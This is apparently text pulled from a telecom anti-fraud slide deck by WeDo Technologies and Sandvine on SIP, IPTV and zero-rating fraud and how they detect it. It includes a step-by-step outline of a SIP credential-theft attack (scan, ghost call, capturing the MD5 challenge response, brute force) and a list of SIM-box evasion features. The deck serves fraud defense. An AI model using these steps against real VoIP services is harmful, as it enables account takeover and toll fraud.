PEDRO FIDALGO, WEDO TECHNOLOGIES DAN DEETH, SANDVINE
• FRAUD OVER IP.
• KNOW YOUR ENEMY.
• SIP FRAUD CHALLENGES
• IPTV FRAUD
• ZERO RATED FRAUD
• ADVANCE FRAUD DETECTION IN IP
• MIGRATION FROM CIRCUIT SWITCH TO IP NETWORKS, SIP, LTE.
• FRAUD DETECTION AND INTRUSION DETECTION HAVE BEEN TRADITIONALLY COMPLETELY SEPARATE RESEARCH AREAS.
• MALICIOUS ACTIVITY + POLICY VIOLATIONS +ARTIFICIAL INTELLIGENCE
• Back in 2011, an attacker (or group of
attackers) performed an Internet-wide
scanning event that was orchestrated
by the botnet
• SIP REGISTER request that trying to
register a dummy user and expecting to
receive a 404 Not Found client failure
response.
• In less than 12 days they were able to
query 4,000,000,000 IP addresses,
which equated to practically
every IPv4 computer on the internet
ANTI-FRAUD DETECTION READY
STEALTH CAPABILITIES
• Port Inter-Calling
• Fake Ring-Back
• Proxy Encryption for IP Block
• Dynamic Allocation and Rotation of Sim
Cards
• IMEI Change
• Internet Data simulation
• BTS Change and Lock
• Carrier Selection
• Sim Bank / Sim Server
ANTI BLOCKING
• Accumulated Duration and Calls
• Consecutive Failed, No Answer, Short
Duration Calls
FEATURES
• Up to 128 Channels
• GSM/CDMA/WCDMA/LTE Frequency’s
• GoIP (SIP and H323)
• Automatic Recharge
SECURITY
• End to End encryption is not ensured since intermediate
SIP servers need to examine and change certain fields of
the SIP messages.
• It only protects a few SIP fields, leaves other important
SIP fields (e.g., SDP, From, To) unprotected
• SIP Messages between SIP Server and UA are in clear
text ,vulnerable to MITM.
• User Agents are required to Authenticate to SIP Servers
but SIP Servers are not required to authenticate to user
agents
• User Agents can be challenged to respond their
credentials. The password is transmitted in MD5 format.
SIP VICIOUS
• Port Scan SIP Port - UDP 5060
• Send a Sip Invite Message (Ghost Call) and Hang Up
• Respond with 407-Proxy-Authentication Msg to the Bye
Msg sent by the user agent
• User agents responds with the password in MD5 format
• Brute Force the MD5 hash containing the password
• Authenticate using the compromised credentials
Sandvine creates a data record for the
selected SIP messages and transmits
it to WeDo.
If WeDo determines that fraud is
occurring it will use the RAID Integrated
Case Management automated workflow
to drive the CSP through the appropriate
next steps.
WeDo analyzes the data record with
data FMS and correlates the event with
historical records and subscriber
information e.g. Customer Type ,
account credit.
12 3
The digital service provider receives $0
revenue and intake the costs of
increased capacity. Streaming will run
for 24/7 if IPTV Boxes are nor turned off.
3User subscribes illegal IPTV services
or downloads piracy apps to find links
to premium video streams.
User receives content through streaming
URLs served from the cloud storage
site.
2
1.1 TB A MONTH
8% TV Piracy Users in U.S and Canada
~ 9Million Users
With 4000 Kbps stream each user will consume
$1.1 BILLION A YEAR 1
Unlicensed Video provider sells thousands
of premium channels from 1 day to 1 year
plans. Service can include IPtv boxes
already configured. Data Records are
created identifying users with streaming
flows as well as content providers.
Raid FMS integrates all alarms helping
CSP’s to identify and quantify the total
amount involved in fraud as well as the
ones creating the highest impacts in
terms of capacity .
Raid FMS creates alarms identifying the
users streaming illegal services as well
as the use of anonymizers to
masquerade the traffic12 3
78.5 billion visits in 2015 to worldwide TV
and piracy films , 73.7% vs 17.3% direct-
download sites (Muso 2015)
Zero rating content is part of many
CSP’s offers, it allows unlimited data to
specific apps, services or websites
These apps are available in the official
store and advertise themselves as tools
to “surf the internet privately and
securely”
Fraudsters use techniques such as Http
Header Injection, Domain Fronting and
DNS Spoofing to disguise data traffic to
make it look as the free data offer.
These apps are available in the official
store and advertise themselves as tools
to “surf the internet privately and
securely”
Fraudsters use techniques such as Http
Header Injection, Domain Fronting and
DNS Spoofing to disguise data traffic to
make it look as the free data offer.
Currently there are 283 VPN like apps
in Google Store
Traffic classification, using deterministic
or signature techniques are used to
identify connections to Psiphon
servers. A data record is transmits to
WeDo
CSPs using the inherit capabilities of
Advance Case Management will be able
to determine the most effective actions
to reduce the Fraud impact.
Raid FMS will cross the events with
historical and behavioral norms
providing additional context to the event.
Alarms can be grouped into multiple
categories providing the CSPs an
holistic view on the fraud impact and
most employed techniques.
12
3
Subscribers exploiting the zero-
rating of a subscriber portal
consumed 300% more than the
average user, impacting,